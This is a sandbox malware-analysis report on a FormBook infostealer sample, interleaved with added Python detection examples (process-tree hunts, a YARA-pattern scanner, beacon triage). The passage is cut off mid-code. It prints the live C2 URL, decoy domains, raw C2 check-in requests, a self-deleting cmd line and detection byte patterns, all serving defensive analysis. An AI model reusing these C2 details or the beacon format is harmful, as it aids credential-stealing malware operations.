Windows Analysis Report pMbPS8nCm1.exe

Overview

General Information

Sample Name: pMbPS8nCm1.exe
Analysis ID: 452687
MD5: de87f1794377537dda721afd9137e491
SHA1: 3b0480a4afe176722d9b8cf6f9f9c9257b1d132f
SHA256: b0a684c7dfc5a94e3dd2edcb1c706eae088ff9d701ec55f0adb1ae977e5e9081
Tags: exe, Formbook

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
C2 URLs / IPs found in malware configuration
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect virtualization through RDTSC time measurements
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Process Tree

  • System is w10x64
  • pMbPS8nCm1.exe (PID: 3492 cmdline: 'C:\Users\user\Desktop\pMbPS8nCm1.exe' MD5: DE87F1794377537DDA721AFD9137E491)
    • pMbPS8nCm1.exe (PID: 5800 cmdline: 'C:\Users\user\Desktop\pMbPS8nCm1.exe' MD5: DE87F1794377537DDA721AFD9137E491)
      • explorer.exe (PID: 3472 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • raserver.exe (PID: 4564 cmdline: C:\Windows\SysWOW64\raserver.exe MD5: 2AADF65E395BFBD0D9B71D7279C8B5EC)
          • cmd.exe (PID: 4396 cmdline: /c del 'C:\Users\user\Desktop\pMbPS8nCm1.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 2196 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup
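The tree above draws explorer.exe beneath PID 5800 because the sandbox follows the code injection into the already-running shell; ordinary process-creation telemetry records explorer.exe with its usual parent and raserver.exe as explorer's child. The Python below is an added example, not code from the report or from Joe Security, that encodes two hunts over such telemetry: a process re-launching its own image with an identical command line (the suspended-copy step of hollowing), and a cmd.exe `/c del` of a binary that already ran, launched by a Windows-directory process that explorer.exe spawned (the self-deletion step). The event records are constructed from the tree; explorer's parent PID, the sample's parent and the cmd.exe image path are assumptions.

```python
"""Hunt process-creation telemetry for the chain in the report's process tree:
a sample that re-launches itself (hollowing), then explorer.exe spawning a
Windows-directory binary whose cmd.exe child deletes the original sample."""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    ppid: int
    image: str
    cmdline: str


SAMPLE = "C:\\Users\\user\\Desktop\\pMbPS8nCm1.exe"

# Constructed from the report's process tree. Assumptions: explorer.exe keeps its
# normal parent (placeholder PID 1) because real telemetry records a CreateProcess,
# not the injection the sandbox draws; the sample was started from explorer.exe;
# cmd.exe ran from SysWOW64 (its parent is a WOW64 process).
EVENTS = [
    ProcEvent(3472, 1, "C:\\Windows\\Explorer.EXE", "C:\\Windows\\Explorer.EXE"),
    ProcEvent(3492, 3472, SAMPLE, f"'{SAMPLE}'"),
    ProcEvent(5800, 3492, SAMPLE, f"'{SAMPLE}'"),
    ProcEvent(4564, 3472, "C:\\Windows\\SysWOW64\\raserver.exe",
              "C:\\Windows\\SysWOW64\\raserver.exe"),
    ProcEvent(4396, 4564, "C:\\Windows\\SysWOW64\\cmd.exe", f"/c del '{SAMPLE}'"),
    ProcEvent(2196, 4396, "C:\\Windows\\system32\\conhost.exe",
              "C:\\Windows\\system32\\conhost.exe 0xffffffff -ForceV1"),
]

WINDOWS_DIRS = ("c:\\windows\\syswow64\\", "c:\\windows\\system32\\")
DEL_RE = re.compile(r"\bdel\b\s+['\"]?([^'\"]+?)['\"]?\s*$", re.IGNORECASE)


def find_self_respawn(events):
    """(parent, child) pairs where a process starts its own image with the same
    command line: the suspended-copy step of process hollowing."""
    by_pid = {e.pid: e for e in events}
    pairs = []
    for e in events:
        p = by_pid.get(e.ppid)
        if p and p.image.lower() == e.image.lower() and p.cmdline == e.cmdline:
            pairs.append((p.pid, e.pid))
    return pairs


def find_delete_chains(events):
    """cmd.exe '/c del <X>' where X is an image that already ran, launched by a
    Windows-directory binary that explorer.exe spawned."""
    by_pid = {e.pid: e for e in events}
    seen_images = {e.image.lower() for e in events}
    chains = []
    for e in events:
        if not e.image.lower().endswith("\\cmd.exe"):
            continue
        m = DEL_RE.search(e.cmdline)
        if not m or m.group(1).lower() not in seen_images:
            continue
        host = by_pid.get(e.ppid)
        if not host or not host.image.lower().startswith(WINDOWS_DIRS):
            continue
        launcher = by_pid.get(host.ppid)
        if not launcher or not launcher.image.lower().endswith("\\explorer.exe"):
            continue
        chains.append({"explorer": launcher.pid, "host": host.pid,
                       "cmd": e.pid, "deleted": m.group(1)})
    return chains


if __name__ == "__main__":
    print("self-respawn pairs:", find_self_respawn(EVENTS))
    for chain in find_delete_chains(EVENTS):
        print("self-delete chain:", chain)
```

Both hunts key on relationships rather than on the LOLBin name, so the same code flags a different SysWOW64 host process or a different sample path; requiring the deleted path to be an image that already executed keeps routine `del` commands from firing.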

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.extinctionbrews.com/dy8g/"], "decoy": ["mzyxi-rkah-y.net", "okinawarongnho.com", "qq66520.com", "nimbus.watch", "cwdelrio.com", "regalshopper.com", "avito-payment.life", "jorgeporcayo.com", "galvinsky.digital", "guys-only.com", "asmfruits-almacenes.com", "boatrace-life04.net", "cochez.club", "thelastvictor.net", "janieleconte.com", "ivoirepneus.com", "saludflv.info", "mydreamtv.net", "austinphy.com", "cajunseafoodstcloud.com", "13006608192.com", "clear3media.com", "thegrowclinic.com", "findfoodshop.com", "livegaming.store", "greensei.com", "atmaapothecary.com", "builtbydawn.com", "wthcoffee.com", "melodezu.com", "oikoschain.com", "matcitekids.com", "killrstudio.com", "doityourselfism.com", "monsoonnerd.com", "swissbankmusic.com", "envisionfordheights.com", "invisiongc.net", "aizaibali.com", "professioneconsulenza.net", "chaneabond.com", "theamercianhouseboat.com", "scuolatua.com", "surivaganza.com", "xn--vuq722jwngjre.com", "quiteimediato.space", "ecofingers.com", "manageoceanaccount.com", "cindywillardrealtor.com", "garimpeirastore.online", "tinsley.website", "fitnesstwentytwenty.com", "thenorthgoldline.com", "scuolacounselingroma.com", "iwccgroup.com", "wideawakemomma.com", "anthonysavillemiddleschool.com", "sprinkleresources.com", "ravexim3.com", "onedadtwodudes.com", "shxytl.com", "iriscloudvideo.com", "theshapecreator.com", "vermogenswerte.com"]}

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
0000000D.00000002.508769679.0000000002FD0000.00000040.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
0000000D.00000002.508769679.0000000002FD0000.00000040.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x85f8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x19797:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1a83a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0000000D.00000002.508769679.0000000002FD0000.00000040.00000001.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
  • 0x166c9:$sqlite3step: 68 34 1C 7B E1
  • 0x167dc:$sqlite3step: 68 34 1C 7B E1
  • 0x166f8:$sqlite3text: 68 38 2A 90 C5
  • 0x1681d:$sqlite3text: 68 38 2A 90 C5
  • 0x1670b:$sqlite3blob: 68 53 D8 7F 8C
  • 0x16833:$sqlite3blob: 68 53 D8 7F 8C
00000001.00000002.248608890.00000000006F0000.00000040.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000001.00000002.248608890.00000000006F0000.00000040.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x85f8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x19797:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1a83a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
(19 entries in the full list)

      Unpacked PEs

Source | Rule | Description | Author | Strings
2.2.pMbPS8nCm1.exe.400000.0.raw.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
2.2.pMbPS8nCm1.exe.400000.0.raw.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x85f8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x19797:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1a83a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
2.2.pMbPS8nCm1.exe.400000.0.raw.unpack | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
  • 0x166c9:$sqlite3step: 68 34 1C 7B E1
  • 0x167dc:$sqlite3step: 68 34 1C 7B E1
  • 0x166f8:$sqlite3text: 68 38 2A 90 C5
  • 0x1681d:$sqlite3text: 68 38 2A 90 C5
  • 0x1670b:$sqlite3blob: 68 53 D8 7F 8C
  • 0x16833:$sqlite3blob: 68 53 D8 7F 8C
2.1.pMbPS8nCm1.exe.400000.0.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
2.1.pMbPS8nCm1.exe.400000.0.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x77f8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x7b92:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x138a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x13391:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x139a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x13b1f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x85aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x1260c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0x9322:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x18997:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x19a3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
(13 entries in the full list)
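The two community rules listed in the Memory Dumps and Unpacked PEs tables match on raw byte sequences: the yara-signator strings are code fragments ($sequence_0, `03 C8 0F 31 2B C1 89 45 FC`, decodes to `add ecx,eax / rdtsc / sub eax,ecx / mov [ebp-4],eax`, the timestamp-counter delta behind the "RDTSC time measurements" signature), and the JPCERT/CC strings are `push imm32` instructions carrying hashed SQLite API names. The Python below is an added example, not the rules themselves and not code from the report or its rule authors: it turns those hex strings into a scanner that reports offsets the way the tables do and applies an "N of them" condition. The real rules' conditions are not shown on this page, so the threshold is an assumption, only `??` byte wildcards are supported, and the scanned buffer is constructed with a few patterns planted at known offsets.

```python
"""Scan a buffer for the byte patterns the community YARA rules above match on,
report offsets, and apply an 'N of them' condition (added example, not the rules)."""
import re
import struct

# Strings copied from the yara-signator Formbook_1 rule as listed in the report.
FORMBOOK_1 = {
    "$sequence_0": "03 C8 0F 31 2B C1 89 45 FC",  # add ecx,eax / rdtsc / sub eax,ecx / mov [ebp-4],eax
    "$sequence_1": "3C 24 0F 84 76 FF FF FF 3C 25 74 94",
    "$sequence_2": "3B 4F 14 73 95 85 C9 74 91",
    "$sequence_3": "3C 69 75 44 8B 7D 18 8B 0F",
    "$sequence_4": "5D C3 8D 50 7C 80 FA 07",
    "$sequence_5": "0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06",
    "$sequence_6": "57 89 45 FC 89 45 F4 89 45 F8",
    "$sequence_7": "66 89 0C 02 5B 8B E5 5D",
    "$sequence_8": "3C 54 74 04 3C 74 75 F4",
    "$sequence_9": "56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00",
}
# Strings from the JPCERT/CC Formbook rule: each is 'push imm32' of a hashed API name.
JPCERT_FORMBOOK = {
    "$sqlite3step": "68 34 1C 7B E1",
    "$sqlite3text": "68 38 2A 90 C5",
    "$sqlite3blob": "68 53 D8 7F 8C",
}


def compile_hex(pattern):
    """Turn a YARA-style hex string ('68 ?? ?? ?? ??') into a bytes regex."""
    parts = []
    for tok in pattern.split():
        parts.append(b"." if tok == "??" else re.escape(bytes([int(tok, 16)])))
    return re.compile(b"".join(parts), re.DOTALL)


def scan(buf, strings):
    """Return {string name: [offsets]} for every pattern found in buf."""
    return {name: [m.start() for m in compile_hex(pat).finditer(buf)]
            for name, pat in strings.items()}


def n_of(hits, n):
    """YARA's 'n of them': at least n distinct strings matched somewhere."""
    return sum(1 for offsets in hits.values() if offsets) >= n


def push_imm32(pattern):
    """Decode the immediate of a 'push imm32' pattern (opcode 0x68, little-endian)."""
    raw = bytes.fromhex(pattern.replace(" ", ""))
    if len(raw) != 5 or raw[0] != 0x68:
        raise ValueError("not a push imm32 pattern")
    return struct.unpack("<I", raw[1:])[0]


def build_sample():
    """Constructed buffer (not a real dump): int3 padding with a few patterns planted."""
    buf = bytearray(b"\xCC" * 0x100)

    def plant(off, pat):
        raw = bytes.fromhex(pat.replace(" ", ""))
        buf[off:off + len(raw)] = raw

    plant(0x10, FORMBOOK_1["$sequence_0"])
    plant(0x40, FORMBOOK_1["$sequence_1"])
    plant(0x80, FORMBOOK_1["$sequence_0"])
    plant(0xC0, JPCERT_FORMBOOK["$sqlite3step"])
    return bytes(buf)


if __name__ == "__main__":
    sample = build_sample()
    for name, offsets in scan(sample, {**FORMBOOK_1, **JPCERT_FORMBOOK}).items():
        if offsets:
            print(name, [hex(o) for o in offsets])
    print("push constants:", [hex(push_imm32(p)) for p in JPCERT_FORMBOOK.values()])
```

Run it against a real `.sdmp` or unpacked PE by reading the file into `scan()`; the offsets it prints are file offsets, the same convention the report's string tables use. Because the yara-signator strings are instruction sequences rather than constants, they survive string encryption but not recompilation, which is why the report matches them only in unpacked and in-memory images, never in the packed file on disk.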

          Sigma Overview

          No Sigma rule has matched

          Jbx Signature Overview

          AV Detection:

Antivirus detection for URL or domain
Source: http://www.aizaibali.com/ | Avira URL Cloud: Label: malware
Source: http://www.wideawakemomma.com/dy8g/?i8PHMrf=n9TsU/XZirCaXaeSUYbcU/ldcwtyxBDUqcAV1OuBRveQ+2sj4hTKAs/tsBNJEPRO40QM&5jLtOl=htxh | Avira URL Cloud: Label: malware
Source: http://www.aizaibali.com/dy8g/?i8PHMrf=iLV9pktedYDy4Ry4OVO/uadmgyKbVGN | Avira URL Cloud: Label: malware
Found malware configuration
Source: 0000000D.00000002.508769679.0000000002FD0000.00000040.00000001.sdmp | Malware Configuration Extractor: FormBook {"C2 list": ["www.extinctionbrews.com/dy8g/"], "decoy": ["mzyxi-rkah-y.net", "okinawarongnho.com", "qq66520.com", "nimbus.watch", "cwdelrio.com", "regalshopper.com", "avito-payment.life", "jorgeporcayo.com", "galvinsky.digital", "guys-only.com", "asmfruits-almacenes.com", "boatrace-life04.net", "cochez.club", "thelastvictor.net", "janieleconte.com", "ivoirepneus.com", "saludflv.info", "mydreamtv.net", "austinphy.com", "cajunseafoodstcloud.com", "13006608192.com", "clear3media.com", "thegrowclinic.com", "findfoodshop.com", "livegaming.store", "greensei.com", "atmaapothecary.com", "builtbydawn.com", "wthcoffee.com", "melodezu.com", "oikoschain.com", "matcitekids.com", "killrstudio.com", "doityourselfism.com", "monsoonnerd.com", "swissbankmusic.com", "envisionfordheights.com", "invisiongc.net", "aizaibali.com", "professioneconsulenza.net", "chaneabond.com", "theamercianhouseboat.com", "scuolatua.com", "surivaganza.com", "xn--vuq722jwngjre.com", "quiteimediato.space", "ecofingers.com", "manageoceanaccount.com", "cindywillardrealtor.com", "garimpeirastore.online", "tinsley.website", "fitnesstwentytwenty.com", "thenorthgoldline.com", "scuolacounselingroma.com", "iwccgroup.com", "wideawakemomma.com", "anthonysavillemiddleschool.com", "sprinkleresources.com", "ravexim3.com", "onedadtwodudes.com", "shxytl.com", "iriscloudvideo.com", "theshapecreator.com", "vermogenswerte.com"]}
Multi AV Scanner detection for submitted file
Source: pMbPS8nCm1.exe | Virustotal: Detection: 26%
Source: pMbPS8nCm1.exe | ReversingLabs: Detection: 41%
Yara detected FormBook
Source: Yara match | File source: 2.2.pMbPS8nCm1.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.1.pMbPS8nCm1.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.pMbPS8nCm1.exe.6f0000.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.pMbPS8nCm1.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.1.pMbPS8nCm1.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.pMbPS8nCm1.exe.6f0000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0000000D.00000002.508769679.0000000002FD0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.248608890.00000000006F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.306388335.00000000009E0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.305709350.00000000005B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000D.00000002.509446252.00000000032A0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000001.246218201.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000D.00000002.506978172.00000000009A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.305134983.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Machine Learning detection for sample
Source: pMbPS8nCm1.exe | Joe Sandbox ML: detected
Source: 13.2.raserver.exe.302d450.3.unpack | Avira: Label: TR/Patched.Ren.Gen
Source: 1.2.pMbPS8nCm1.exe.5a0000.2.unpack | Avira: Label: TR/Patched.Ren.Gen
Source: 2.1.pMbPS8nCm1.exe.400000.0.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: 1.2.pMbPS8nCm1.exe.6f0000.3.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: 2.2.pMbPS8nCm1.exe.400000.0.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: 13.2.raserver.exe.5167960.6.unpack | Avira: Label: TR/Patched.Ren.Gen
Source: pMbPS8nCm1.exe | Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, RELOCS_STRIPPED
Source: Binary string: wntdll.pdbUGP | source: pMbPS8nCm1.exe, 00000001.00000003.245067685.0000000002480000.00000004.00000001.sdmp, pMbPS8nCm1.exe, 00000002.00000002.306527493.0000000000A10000.00000040.00000001.sdmp, raserver.exe, 0000000D.00000002.511116133.0000000004D4F000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdb | source: pMbPS8nCm1.exe, raserver.exe
Source: Binary string: RAServer.pdb | source: pMbPS8nCm1.exe, 00000002.00000002.308172933.0000000000D70000.00000040.00000001.sdmp
Source: Binary string: RAServer.pdbGCTL | source: pMbPS8nCm1.exe, 00000002.00000002.308172933.0000000000D70000.00000040.00000001.sdmp
Source: C:\Users\user\Desktop\pMbPS8nCm1.exe | Code function: 4x nop then pop esi
Source: C:\Users\user\Desktop\pMbPS8nCm1.exe | Code function: 4x nop then pop ebx
Source: C:\Users\user\Desktop\pMbPS8nCm1.exe | Code function: 4x nop then pop edi
Source: C:\Windows\SysWOW64\raserver.exe | Code function: 4x nop then pop esi
Source: C:\Windows\SysWOW64\raserver.exe | Code function: 4x nop then pop ebx
Source: C:\Windows\SysWOW64\raserver.exe | Code function: 4x nop then pop edi

          Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic | Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49735 -> 34.102.136.180:80
Source: Traffic | Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49735 -> 34.102.136.180:80
Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49735 -> 34.102.136.180:80
Source: Traffic | Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49739 -> 172.104.157.41:80
Source: Traffic | Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49739 -> 172.104.157.41:80
Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49739 -> 172.104.157.41:80
Source: Traffic | Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49743 -> 34.102.136.180:80
Source: Traffic | Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49743 -> 34.102.136.180:80
Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49743 -> 34.102.136.180:80
Source: Traffic | Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49745 -> 209.99.40.222:80
Source: Traffic | Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49745 -> 209.99.40.222:80
Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49745 -> 209.99.40.222:80
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor | URLs: www.extinctionbrews.com/dy8g/
Source: global traffic | HTTP traffic detected: GET /dy8g/?i8PHMrf=M2y08b4guDc7ky1UfP9B2E9DVQMkOM+mjhyUMO8ZT8ajlM0broLEOhQJKgG+gbTLwEQu&5jLtOl=htxh HTTP/1.1 | Host: www.cochez.club | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /dy8g/?i8PHMrf=d70oYrFBgMb8Os9vLLnU0lHHdKTBSZLAimar8DFO2VzVjiqJdJvZleKp8o5Ll6MGkmh7&5jLtOl=htxh HTTP/1.1 | Host: www.cindywillardrealtor.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /dy8g/?i8PHMrf=n9TsU/XZirCaXaeSUYbcU/ldcwtyxBDUqcAV1OuBRveQ+2sj4hTKAs/tsBNJEPRO40QM&5jLtOl=htxh HTTP/1.1 | Host: www.wideawakemomma.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /dy8g/?i8PHMrf=vEc9l3KIwUbL2yE9akOYH6tpFpdH8sidHZA37HjQYo0aYTivi/dQORBe2IJ6crCUqb4r&5jLtOl=htxh HTTP/1.1 | Host: www.vermogenswerte.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /dy8g/?i8PHMrf=ECrCAtcV2n6MmfvkEdEbFHcY5Y6SYRzoX56/iPQe4p5qRx/lRHZ+fK1TxUEBZfQE2R2Q&5jLtOl=htxh HTTP/1.1 | Host: www.thenorthgoldline.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /dy8g/?i8PHMrf=DjnY/S7/G1yk/GGdjnbMG0pwlAlipgBY8a8MDSEvYTAaE8/8s3MkSQswoGD3PCL74z9p&5jLtOl=htxh HTTP/1.1 | Host: www.extinctionbrews.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: Joe Sandbox View | IP Address: 95.215.210.10
Source: Joe Sandbox View | ASN Name: NEWIT-ASRU
Source: Joe Sandbox View | ASN Name: LINODE-APLinodeLLCUS
Source: unknown | DNS traffic detected: queries for: www.cochez.club
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Thu, 22 Jul 2021 16:05:24 GMT | Server: Apache/2.4.6 (CentOS) PHP/7.3.19 | Content-Length: 203 | Connection: close | Content-Type: text/html; charset=iso-8859-1 | Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 64 79 38 67 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a | Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /dy8g/ was not found on this server.</p></body></html>
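The GET requests above share one path (`/dy8g/`), the same two query-parameter names (a long encrypted blob in `i8PHMrf` and the constant `5jLtOl=htxh`), and carry no User-Agent, while the Host header walks through the configuration's decoy domains; only www.extinctionbrews.com is the C2 list entry, and the 404 from a decoy is the expected answer from a site that has nothing to do with the campaign. The Python below is an added example, not code from the report or from Joe Security: it parses raw HTTP requests, groups them by URI template, flags a template sent to several distinct hosts, and labels each host as c2, decoy or unknown against the extracted configuration. The request records are constructed from the ones listed here plus one benign control request, and the configuration is the report's C2 entry with a subset of its decoys.

```python
"""Triage FormBook-style check-ins: one URI template beaconed round-robin to many
hosts, then tell the real C2 from the decoys using the extracted configuration."""
from collections import defaultdict
from urllib.parse import parse_qsl, urlsplit

# Subset of the report's extracted configuration: the C2 entry plus the decoys that
# appear as Host headers below (the full decoy list is in the Malware Configuration).
CONFIG = {
    "C2 list": ["www.extinctionbrews.com/dy8g/"],
    "decoy": ["cochez.club", "cindywillardrealtor.com", "wideawakemomma.com",
              "vermogenswerte.com", "thenorthgoldline.com"],
}


def beacon(host, blob):
    """Constructed request in the exact shape the report shows (no User-Agent)."""
    return (f"GET /dy8g/?i8PHMrf={blob}&5jLtOl=htxh HTTP/1.1\r\n"
            f"Host: {host}\r\nConnection: close\r\n\r\n")


RAW_REQUESTS = [
    beacon("www.cochez.club", "M2y08b4guDc7ky1UfP9B2E9DVQMkOM+mjhyUMO8ZT8ajlM0broLEOhQJKgG+gbTLwEQu"),
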